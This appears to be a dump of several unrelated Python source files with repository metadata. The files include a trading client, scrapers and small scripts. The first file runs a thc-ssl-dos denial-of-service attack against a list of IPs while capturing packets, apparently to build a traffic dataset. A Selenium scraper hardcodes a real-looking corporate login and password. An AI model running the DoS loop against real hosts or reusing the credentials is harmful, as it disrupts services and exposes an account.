parent = psutil.Process(driver.service.process.pid)
chromeProcesses = (parent.children(recursive=True))
if chromeProcesses != "":
for process in chromeProcesses:
p = psutil.Process(process.pid)
p.kill()
try:
driver.quit()
except TimeoutException as toe:
logging.exception(str(toe) + " Driver failed to close")
except UnexpectedAlertPresentException as uape:
logging.exception(str(uape) + " unexpected alert present!")
driver.switch_to.alert.accept()
driver.close()
finally:
driver.quit()
# Terminate selenium
try:
driver.quit()
except NameError as NE:
logging.error(str(NE))
driver.close()
def attack(ip):
count = 0
while isNormal == 0 :
time.sleep(1)
count = count + 1
if count == 60 :
global isAttacking
isAttacking = 0
return
print('ready to attack at ' + str(ip))
# Initializer for thc-ssl-dos
# Declaring variables for thc-ssl-dos
parallel_connections = 1
port = 443
logging.info("DDOSING at " + ip)
thc_command = "thc-ssl-dos -l " + str(parallel_connections) + " " + ip + " " + str(port) + " " + "--accept"
GNULL = open(os.devnull, 'w')
thc_process = subprocess.Popen(thc_command, shell=True, stdout=GNULL)
logging.info("Opened DOS attack at " + ip)
# Sleeping for 25 seconds before killing them off
time.sleep(60)
kill_thc = "killall -s SIGTERM thc-ssl-dos"
kill_sniff = "killall -s SIGTERM tshark"
os.system(kill_thc)
os.system(kill_sniff)
isAttacking = 0;
print('THE ATTACK HAS STOPPED. Exiting the attack thread..')
logging.info("DDOS finished for " + ip)
if __name__ == '__main__' :
# Initializing the dictionary to be able to retrieve the names easily
# Different IP (Key) lead to same Domain (Value)
for index, row in df.iterrows():
domain = row['Domain']
ip = row['IP']
dictionary[ip] = domain
for index, row in df_dos.iterrows():
domain = row['Domain']
ip = row['IP']
dictionary_dos[ip] = domain
if(len(dictionary) < len(dictionary_dos)):
length = len(dictionary)
else:
length = len(dictionary_dos)
logging.basicConfig(filename='mixed_traffic.log', level=logging.INFO, format='%(asctime)s-%(levelname)s-%(message)s')
location = "/media/sf_Shared2/mixed/"
#location = "output/"
file_path = os.path.join(location + "mixed_traffic/" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
if not os.path.exists(file_path):
os.makedirs(file_path)
####################for single testing########################################
#ip_normal = ip_list_normal[0]
#ip_dos = ip_list_dos[0]
#isAttacking = 1
#isNormal = 0
# SNIFFER
# Declaring variables for the sniffer
# Capture filter ip_list[0] is taken as the first IP resolved to capture
# Might not be too perfect in the case
#abspath = os.path.abspath(file_path)
#interface = "eth0"
#capture_filter = "tcp port 443 and host " + ip_normal + " or " + ip_dos
#filename = abspath + "/" + ip_normal + "_" + ip_dos + "_" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + ".pcap"
# Raw capturing
#command = ["tshark", "-i", interface, "-c", "5000", "-f", capture_filter, "-w", filename]
#command = ["tshark", "-i", interface, "-f", capture_filter, "-w", filename]
#sts = subprocess.Popen(command, shell=False)
#time.sleep(5)
#normal_t = threading.Thread(target=normal, args=(ip_normal,))
#normal_t.start()
#attack_t = threading.Thread(target=attack, args=(ip_dos,))
#attack_t.start()
##############################################################################
for i in range(814, length):
ip_dos = ip_list_dos[i]
ip_normal = ip_list_normal[i]
print("normal at " + ip_normal)
print("ddos at " + ip_dos)
isAttacking = 1
isNormal = 0
# SNIFFER
# Declaring variables for the sniffer
# Capture filter ip_list[0] is taken as the first IP resolved to capture
# Might not be too perfect in the case
abspath = os.path.abspath(file_path)
interface = "eth0"
capture_filter = "tcp port 443 and host " + ip_normal + " or " + ip_dos
filename = abspath + "/" + ip_normal + "_" + ip_dos + "_" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + ".pcap"
# Raw capturing
#command = ["tshark", "-i", interface, "-c", "5000", "-f", capture_filter, "-w", filename]
command = ["tshark", "-i", interface, "-f", capture_filter, "-w", filename]
sts = subprocess.Popen(command, shell=False)
time.sleep(5)
normal_t = threading.Thread(target=normal, args=(ip_normal,))
normal_t.start()
attack_t = threading.Thread(target=attack, args=(ip_dos,))
attack_t.start()
while isAttacking == 1 :
time.sleep(2)
print('attack has stopped..')
normal_t.join()
attack_t.join()
| [
"[email protected]"
] | |
9c49f34c4e0af8d51ca97a03a373e5fc2d76440a | f0a5ad7b8aa39f51f233391fead0da3eabecc4ee | /.history/toolbox/middleware_20191129081531.py | bed0186b917d604de34c93cc7df6e8c7ddb4bfb8 | [] | no_license | OseiasBeu/webScrapping | e0a524847e55b24dbbd3d57bbe7fa43b4e101f48 | 1e72c7551aea355a891043baecfcbab8a89e719a | refs/heads/master | 2022-10-25T18:12:50.858653 | 2020-06-18T01:29:24 | 2020-06-18T01:29:24 | 224,681,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,601 | py | # -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from datetime import datetime
import toolbox.sheets as sheet
import pandas as pd
def middleware():
driver = webdriver.Chrome(executable_path='chromedriver.exe')
driver.get("https://wsmid-prd.whirlpool.com.br/manager/reports/frmQueryAnalyzer.aspx?menu=2")
dominio = 'whirlpool'
usuario = 'daniel_coelho'
senha = 'Sua95xb4'
bra = "BRA"
data = '2019-11-01'
query = "SELECT pedido.clienteEstado, pedidoItem.warehouseId, count(pedidoItem.warehouseId) as [Pendentes de integração] FROM pedido LEFT JOIN pedidoItem ON pedido.codigoPedido = pedidoItem.codigoPedido WHERE pedido.datahoracriacao > '{}' AND pedido.clientepais = '{}' AND pedido.flagIntegrado = 0 GROUP BY pedidoItem.warehouseId, pedido.clienteEstado ORDER BY [Pendentes de integração] DESC".format(data,bra)
campo_dominio = driver.find_element_by_id("ucLogin1_txtDominio")
campo_dominio.send_keys(dominio)
campo_usuario =driver.find_element_by_id("ucLogin1_txtUser")
campo_usuario.send_keys(usuario)
campo_senha = driver.find_element_by_id("ucLogin1_txtPass")
campo_senha.send_keys(senha)
campo_senha.send_keys(Keys.RETURN)
records = driver.find_element_by_id("ctl00_ContentPlaceHolder1_dropRows")
records.send_keys('sem limites')
text_query = driver.find_element_by_id("ctl00_ContentPlaceHolder1_txtQuery")
text_query.send_keys(query)
executar = driver.find_element_by_id("ctl00_ContentPlaceHolder1_imbExecutar").click()
arr = []
resposta = driver.find_elements_by_tag_name('tr')
for item in range(len(resposta)):
linha = resposta[item].text
arr.append(linha.split())
coluna = arr[3]
coluna1 = coluna.pop(3)
coluna1 = coluna1 +" "+ coluna.pop(3)
coluna1 = coluna1 +" "+ coluna.pop(3)
coluna.append(coluna1)
df = pd.DataFrame(data=arr[4:], columns=coluna)
# df = df.insert(0,'timeStamp')
now = datetime.now()
df['timeStamp'] = ''
df1 = df.drop(columns='#')
wb = pd.ExcelFile('base_middleware.xlsx')
base_m = pd.read_excel(wb)
print(base_m.head())
print(df1.head())
sheet.insertPlanMiddleware(df1)
base_m['timeStamp'] = datetime.now().strftime('%m/%S/%Y %H:%M:%S')
print(df1)
df1.append(base_m)
print(base_m)
nomeArquivo = 'base_middleware.xlsx'
df1.to_excel(nomeArquivo, index=False)
sair = driver.find_element_by_id("ctl00_lgStatus").click()
driver.close()
# clienteEstado warehouseId Pendentes de integração Última hora? | [
"[email protected]"
] | |
43d3606680c7c08b541d8e66a106bbe7f13c0fa7 | 2923b9f58e6a143a3e070169612165585c301def | /LA/gp_rupture_test/LA/gp_rupture_test/gp_021219_Scott_7.35_noplas_2hz/fault_full_loc.py | d3f385c3d1a7f68a7593b81008a1ecdc93ae3228 | [] | no_license | hzfmer/summit_work_021421 | 16536dd716519bc9244da60007b9061ef5403429 | 6981b359fefb2af22e0bea6c47511de16cad22bd | refs/heads/master | 2023-03-11T15:34:36.418971 | 2021-02-05T23:22:10 | 2021-02-05T23:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,451 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 17 2018
@author: Zhifeng Hu <[email protected]>
"""
import numpy as np
from numpy import sin, cos, pi, sqrt
import os
import sys
import glob
import time
nt_ref = 2000
nt_des = 10 * nt_ref
theta_rot = 35
f = open(glob.glob('./*.srf')[0],'r')
f.readline()
f.readline()
token = f.readline()
nx = int(token.split()[2])
nz = int(token.split()[3])
f.close()
if not os.path.isfile('fault_full_loc.txt'):
fault_loc = np.array(np.loadtxt("fault_loc.idx"))
x1 = int(fault_loc[0,0])
x2 = int(fault_loc[1,0])
y1 = int(fault_loc[0,1])
y2 = int(fault_loc[1,1])
x_tmp = np.linspace(x1, x2, np.abs(x2 - x1) + 1)
y_tmp = [np.float((y2-y1)/(x2-x1))*(x-x1) + y1 for x in x_tmp]
f_interp=interp1d(x_tmp, y_tmp, fill_value='extrapolate')
if x1 < x2:
new_x = np.arange(x1, x1 + nx * 2 )
new_y = [np.int(i) for i in f_interp(new_x)]
else:
new_x = np.arange(x1 + 1 - nx * 2, x1 + 1)
new_y = [np.int(i) for i in f_interp(new_x)]
new_x = new_x[::-1]
new_y = new_y[::-1]
mx = 6320
my = 4200
ll = np.fromfile('../scripts/surf.grid', dtype='float64', count=2 * my * mx).reshape(my, mx, 2)
ll_fault = [np.float32((ll[new_y[i], new_x[i], 0], ll[new_y[i], new_x[i], 1])) for i in range(len(new_x))]
np.savetxt('fault_full_loc.txt', ll, fmt='%f')
# np.array(ll_fault).tofile('latlon_fault.bin')
| [
"[email protected]"
] | |
3a2aace405551240c749077517533bdee9b234de | e562f7e0a51273475e50a7e61d1d377f88775622 | /flags.py | 39c29607dfbc5649d50a4d7b0c0d48d7e2e0df9b | [] | no_license | bloodcurdle/ReadableWebProxy | d1c6ae0220fdb04ea7ab82963c86e776a0dbbfd9 | 10f68f913a78f8b0e47582996d9860a61da55dd6 | refs/heads/master | 2021-05-29T19:58:32.965610 | 2015-11-09T18:25:00 | 2015-11-09T18:25:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py |
RUNSTATE = True
FEEDER_STARTED = False
RSS_DEBUG = False
RULE_CACHE = None
SPECIAL_CASE_CACHE = None | [
"[email protected]"
] | |
c553f3cf8e814068e3de80a5d5d74670c9a32497 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_212/62.py | 2e921c86f22c4e6edb1a0681c1da5040d943a43a | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | import sys
import itertools
sys.setrecursionlimit(10000000)
tc = int(sys.stdin.readline().strip())
for tmp_tc in xrange(tc):
[ N, P ] = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
gs = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
cnts = [ 0 ] * P
for g in gs:
cnts[g % P] += 1
cache = {}
def dp(cfg, p):
if sum(cfg) == 0: return 0
key = tuple(cfg), p
if key in cache: return cache[key]
res = None
for idx, k in enumerate(cfg):
if k == 0: continue
cfg[idx] -= 1
pp = (p + idx) % P
tmp = dp(cfg, pp)
if p: tmp += 1
if res is None or res > tmp: res = tmp
cfg[idx] += 1
cache[key] = res
return res
res = len(gs) - dp(cnts, 0)
print "Case #%d: %d" % (1+tmp_tc, res)
| [
"[email protected]"
] | |
73be991d92aa7d1f221c705467c3b65a83ab1b85 | c8faa6a4343a1b3775eb0cd707271f6c4aede6be | /quant/platform/deribit.py | 3d076c1c19b2afd753315af68b2af69209a0dfa9 | [
"MIT"
] | permissive | 51bitquant/thenextquant | adada6c2b88723971413f12df23505bd250c86d0 | b0b9d60439a916bc4b1980f908f648aa863d5918 | refs/heads/master | 2023-05-29T21:23:18.198952 | 2023-05-14T08:42:56 | 2023-05-14T08:42:56 | 640,403,755 | 6 | 2 | null | 2023-05-14T01:06:46 | 2023-05-14T01:06:45 | null | UTF-8 | Python | false | false | 13,662 | py | # -*- coding:utf-8 -*-
"""
Deribit Trade module 交易模块
https://docs.deribit.com/v2/
Author: HuangTao
Date: 2019/04/20
"""
import json
import copy
import asyncio
from quant.utils import logger
from quant.const import DERIBIT
from quant.position import Position
from quant.utils.websocket import Websocket
from quant.tasks import LoopRunTask, SingleTask
from quant.utils.decorator import async_method_locker
from quant.order import Order
from quant.order import ORDER_ACTION_BUY, ORDER_ACTION_SELL
from quant.order import ORDER_TYPE_LIMIT, ORDER_TYPE_MARKET
from quant.order import ORDER_STATUS_SUBMITTED, ORDER_STATUS_PARTIAL_FILLED, ORDER_STATUS_FILLED, \
ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED
from quant.order import TRADE_TYPE_BUY_OPEN, TRADE_TYPE_SELL_OPEN, TRADE_TYPE_SELL_CLOSE, TRADE_TYPE_BUY_CLOSE
class DeribitTrade(Websocket):
""" Deribit Trade module 交易模块
"""
def __init__(self, account, strategy, symbol, host=None, wss=None, access_key=None, secret_key=None,
order_update_callback=None, position_update_callback=None):
""" 初始化
@param account 账户
@param strategy 策略名称
@param symbol 交易对(合约名称)
@param host HTTP请求主机地址
@param wss websocket连接地址
@param access_key ACCESS KEY
@param secret_key SECRET KEY
@param order_update_callback 订单更新回调
@param position_update_callback 持仓更新回调
"""
self._account = account
self._strategy = strategy
self._platform = DERIBIT
self._symbol = symbol
self._host = host if host else "https://www.deribit.com"
self._wss = wss if wss else "wss://deribit.com/ws/api/v2"
self._access_key = access_key
self._secret_key = secret_key
self._order_update_callback = order_update_callback
self._position_update_callback = position_update_callback
self._order_channel = "user.orders.{symbol}.raw".format(symbol=symbol) # 订单订阅频道
super(DeribitTrade, self).__init__(self._wss, send_hb_interval=5)
self._orders = {} # 订单
self._position = Position(self._platform, self._account, strategy, symbol) # 仓位
self._query_id = 0 # 消息序号id,用来唯一标识请求消息
self._queries = {} # 未完成的post请求 {"request_id": future}
self.initialize()
# 注册定时任务
LoopRunTask.register(self._do_auth, 60 * 60) # 每隔1小时重新授权
LoopRunTask.register(self._check_position_update, 1) # 获取持仓
self._ok = False # 是否建立授权成功的websocket连接
@property
def position(self):
return copy.copy(self._position)
@property
def orders(self):
return copy.copy(self._orders)
async def connected_callback(self):
""" 建立连接之后,授权登陆,然后订阅order和position
"""
# 授权
success, error = await self._do_auth()
if error:
return
if success.get("access_token"):
self._ok = True
else:
return
# 获取未完全成交的订单
success, error = await self.get_open_orders()
if error:
return
for order_info in success:
order = self._update_order(order_info)
if self._order_update_callback:
SingleTask.run(self._order_update_callback, order)
# 获取持仓
await self._check_position_update()
# 授权成功之后,订阅数据
method = "private/subscribe"
params = {
"channels": [
self._order_channel
]
}
await self._send_message(method, params)
async def _do_auth(self, *args, **kwargs):
""" 鉴权
"""
method = "public/auth"
params = {
"grant_type": "client_credentials",
"client_id": self._access_key,
"client_secret": self._secret_key
}
success, error = await self._send_message(method, params)
return success, error
async def get_server_time(self):
""" 获取服务器时间
"""
method = "public/get_time"
params = {}
success, error = await self._send_message(method, params)
return success, error
async def get_position(self):
""" 获取当前持仓
"""
method = "private/get_position"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
return success, error
async def create_order(self, action, price, quantity, order_type=ORDER_TYPE_LIMIT):
""" 创建订单
@param action 委托方向 BUY SELL
@param price 委托价格
@param quantity 委托数量
@param order_type 委托类型 limit/market
"""
if int(quantity) > 0:
if action == ORDER_ACTION_BUY:
trade_type = TRADE_TYPE_BUY_OPEN
else:
trade_type = TRADE_TYPE_SELL_CLOSE
else:
if action == ORDER_ACTION_BUY:
trade_type = TRADE_TYPE_BUY_CLOSE
else:
trade_type = TRADE_TYPE_SELL_OPEN
quantity = abs(int(quantity))
if action == ORDER_ACTION_BUY:
method = "private/buy"
elif action == ORDER_ACTION_SELL:
method = "private/sell"
else:
logger.error("action error! action:", action, caller=self)
return None
if order_type == ORDER_TYPE_LIMIT:
type_ = "limit"
else:
type_ = "market"
params = {
"instrument_name": self._symbol,
"price": price,
"amount": quantity,
"type": type_,
"label": str(trade_type)
}
success, error = await self._send_message(method, params)
if error:
return None, error
order_no = success["order"]["order_id"]
return order_no, None
async def revoke_order(self, *order_nos):
""" 撤销订单
@param order_nos 订单号,如果没有指定订单号,那么撤销所有订单
* NOTE: 单次调换最多只能撤销100个订单,如果订单超过100个,请多次调用
"""
# 如果传入order_nos为空,即撤销全部委托单
if len(order_nos) == 0:
method = "private/cancel_all_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
if error:
return False, error
else:
return True, None
# 如果传入order_nos为一个委托单号,那么只撤销一个委托单
if len(order_nos) == 1:
method = "private/cancel"
params = {"order_id": order_nos[0]}
success, error = await self._send_message(method, params)
if error:
return order_nos[0], error
else:
return order_nos[0], None
# 如果传入order_nos数量大于1,那么就批量撤销传入的委托单
if len(order_nos) > 1:
success, error = [], []
method = "private/cancel"
for order_no in order_nos:
params = {"order_id": order_no}
r, e = await self._send_message(method, params)
if e:
error.append((order_no, e))
else:
success.append(order_no)
return success, error
async def get_order_status(self, order_no):
""" 获取订单状态
@param order_no 订单号
"""
method = "private/get_order_state"
params = {"order_id": order_no}
success, error = await self._send_message(method, params)
return success, error
async def get_open_orders(self):
""" 获取未完全成交订单
"""
method = "private/get_open_orders_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
return success, error
async def get_open_order_nos(self):
""" 获取未完全成交订单号列表
"""
method = "private/get_open_orders_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
if error:
return None, error
else:
order_nos = []
for item in success:
order_nos.append(item["order_id"])
return order_nos, None
async def _send_message(self, method, params):
""" 发送消息
"""
f = asyncio.futures.Future()
request_id = await self._generate_query_id()
self._queries[request_id] = f
data = {
"jsonrpc": "2.0",
"id": request_id,
"method": method,
"params": params
}
await self.ws.send_json(data)
logger.debug("send message:", data, caller=self)
success, error = await f
if error:
logger.error("data:", data, "error:", error, caller=self)
return success, error
@async_method_locker("generate_query_id.locker")
async def _generate_query_id(self):
""" 生成query id,加锁,确保每个请求id唯一
"""
self._query_id += 1
return self._query_id
@async_method_locker("process.locker")
async def process(self, msg):
""" 处理websocket消息
"""
logger.debug("msg:", json.dumps(msg), caller=self)
# 请求消息
request_id = msg.get("id")
if request_id:
f = self._queries.pop(request_id)
if f.done():
return
success = msg.get("result")
error = msg.get("error")
f.set_result((success, error))
# 推送订阅消息
if msg.get("method") == "subscription":
if msg["params"]["channel"] == self._order_channel:
order_info = msg["params"]["data"]
order = self._update_order(order_info)
if self._order_update_callback:
SingleTask.run(self._order_update_callback, copy.copy(order))
async def _check_position_update(self, *args, **kwargs):
""" 定时获取持仓
"""
if not self._ok:
return
update = False
success, error = await self.get_position()
if error:
return
if not self._position.utime: # 如果持仓还没有被初始化,那么初始化之后推送一次
update = True
self._position.update()
size = int(success["size"])
average_price = float(success["average_price"])
liquid_price = float(success["estimated_liquidation_price"])
if size > 0:
if self._position.long_quantity != size:
update = True
self._position.update(0, 0, size, average_price, liquid_price)
elif size < 0:
if self._position.short_quantity != abs(size):
update = True
self._position.update(abs(size), average_price, 0, 0, liquid_price)
elif size == 0:
if self._position.long_quantity != 0 or self._position.short_quantity != 0:
update = True
self._position.update()
if update:
await self._position_update_callback(self._position)
def _update_order(self, order_info):
""" 更新订单信息
@param order_info 订单信息
"""
order_no = order_info["order_id"]
quantity = int(order_info["amount"])
filled_amount = int(order_info["filled_amount"])
remain = quantity - filled_amount
average_price = order_info.get("average_price")
state = order_info["order_state"]
if state == "open":
status = ORDER_STATUS_SUBMITTED
if filled_amount > 0:
status = ORDER_STATUS_PARTIAL_FILLED
elif state == "filled":
status = ORDER_STATUS_FILLED
elif state == "cancelled":
status = ORDER_STATUS_CANCELED
else:
status = ORDER_STATUS_FAILED
order = self._orders.get(order_no)
if not order:
action = ORDER_ACTION_BUY if order_info["direction"] == "buy" else ORDER_ACTION_SELL
trade_type = int(order_info.get("label"))
info = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"symbol": self._symbol,
"order_no": order_no,
"action": action,
"price": order_info["price"],
"quantity": quantity,
"remain": remain,
"trade_type": trade_type
}
order = Order(**info)
self._orders[order_no] = order
order.status = status
order.remain = remain
order.avg_price = average_price
order.ctime = order_info["creation_timestamp"]
order.utime = order_info["last_update_timestamp"]
if order.status in [ORDER_STATUS_FILLED, ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED]:
self._orders.pop(order.order_no)
return order
| [
"[email protected]"
] | |
b2fc4e3cfd43f94cd2d66299af2e1b8145681be7 | fea4402f50b7a340db6122bf900243ada95018d4 | /src/password_manager/panel.py | 95422dcff8e5867e452ed91b6ffda710644ee538 | [] | no_license | CloudPadovana/openstack-security-integrations | ae516c5e7b15cee50fd01da3d69f66bfb26dde10 | fc22a9930aecc466d7b29af4095fbe922962077a | refs/heads/master | 2023-08-08T09:51:30.659062 | 2023-07-28T10:00:28 | 2023-07-28T10:00:28 | 14,750,978 | 0 | 2 | null | 2017-11-17T14:29:47 | 2013-11-27T15:31:37 | Python | UTF-8 | Python | false | false | 936 | py | # Copyright (c) 2014 INFN - "Istituto Nazionale di Fisica Nucleare" - Italy
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import gettext_lazy as _
import horizon
from openstack_dashboard.dashboards.settings import dashboard
class PasswordPanel(horizon.Panel):
name = _("Manage Password")
slug = 'password_manager'
dashboard.Settings.register(PasswordPanel)
| [
"[email protected]"
] | |
6d73d131e26cfb65c423acd5a641958d3283c4e9 | 8704a683e1fa8c7c15d114fca47345eef060326b | /类/Pingclass.py | 37f162cbbd1550ec1a90053f63e4624826cfe8ab | [] | no_license | jiaojiner/Python_Basic | 823be07e8c02585174d933bc3e4ecf528086162c | 788243f95746e2a00890ebb3262085598ab84800 | refs/heads/master | 2020-12-31T22:47:04.561208 | 2020-11-23T13:59:04 | 2020-11-23T13:59:04 | 239,061,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | #!/usr/bin/env python3
# -*- encoding = utf-8 -*-
# 该代码由本人学习时编写,仅供自娱自乐!
# 本人QQ:1945962391
# 欢迎留言讨论,共同学习进步!
from scapy.layers.inet import IP, ICMP
from scapy.sendrecv import sr1
class Pingclass:
def __init__(self, srcip, dstip, qua=1):
self.srcip = srcip
self.ip = dstip
self.qua = qua
self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()
# def src(self, srcip):
# self.srcip = srcip
# self.pkt = IP(src=self.srcip, dst=self.ip)/ICMP()
def ping(self):
for x in range(self.qua):
result = sr1(self.pkt, timeout=1, verbose=False)
if result:
print(self.ip, '可达!')
else:
print(self.ip, '不可达!')
| [
"[email protected]"
] | |
970b585846494138f5ad4e230612d400e3710200 | 727f1bc2205c88577b419cf0036c029b8c6f7766 | /out-bin/py/google/fhir/models/run_locally.runfiles/com_google_fhir/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/util/lazy_loader.py | 44594aaf70c93ad1b1494c16df3e8a52cb7efb6d | [
"Apache-2.0"
] | permissive | rasalt/fhir | 55cf78feed3596a3101b86f9e9bbf6652c6ed4ad | d49883cc4d4986e11ca66058d5a327691e6e048a | refs/heads/master | 2020-04-13T00:16:54.050913 | 2019-01-15T14:22:15 | 2019-01-15T14:22:15 | 160,260,223 | 0 | 0 | Apache-2.0 | 2018-12-03T22:07:01 | 2018-12-03T22:07:01 | null | UTF-8 | Python | false | false | 178 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/util/lazy_loader.py | [
"[email protected]"
] | |
66e0c84a835d00f66e63f4eabefe603562658452 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/EBackend/CollectionBackendClass.py | 9bef82e9cc16e52ae4c3acc39b19c2255df0443e | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 6,476 | py | # encoding: utf-8
# module gi.repository.EBackend
# from /usr/lib64/girepository-1.0/EBackend-1.2.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.EDataServer as __gi_repository_EDataServer
import gi.repository.Gio as __gi_repository_Gio
import gobject as __gobject
class CollectionBackendClass(__gi.Struct):
"""
:Constructors:
::
CollectionBackendClass()
"""
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
child_added = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
child_removed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource_finish = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
create_resource_sync = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource_finish = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
delete_resource_sync = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
dup_resource_id = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
parent_class = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
populate = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
reserved = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(CollectionBackendClass), '__module__': 'gi.repository.EBackend', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'CollectionBackendClass' objects>, '__weakref__': <attribute '__weakref__' of 'CollectionBackendClass' objects>, '__doc__': None, 'parent_class': <property object at 0x7f9dc2d881d0>, 'populate': <property object at 0x7f9dc2d882c0>, 'dup_resource_id': <property object at 0x7f9dc2d883b0>, 'child_added': <property object at 0x7f9dc2d884a0>, 'child_removed': <property object at 0x7f9dc2d88590>, 'create_resource_sync': <property object at 0x7f9dc2d886d0>, 'create_resource': <property object at 0x7f9dc2d88770>, 'create_resource_finish': <property object at 0x7f9dc2d888b0>, 'delete_resource_sync': <property object at 0x7f9dc2d889a0>, 'delete_resource': <property object at 0x7f9dc2d88a40>, 'delete_resource_finish': <property object at 0x7f9dc2d88b80>, 'reserved': <property object at 0x7f9dc2d88c20>})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(CollectionBackendClass)
| [
"[email protected]"
] | |
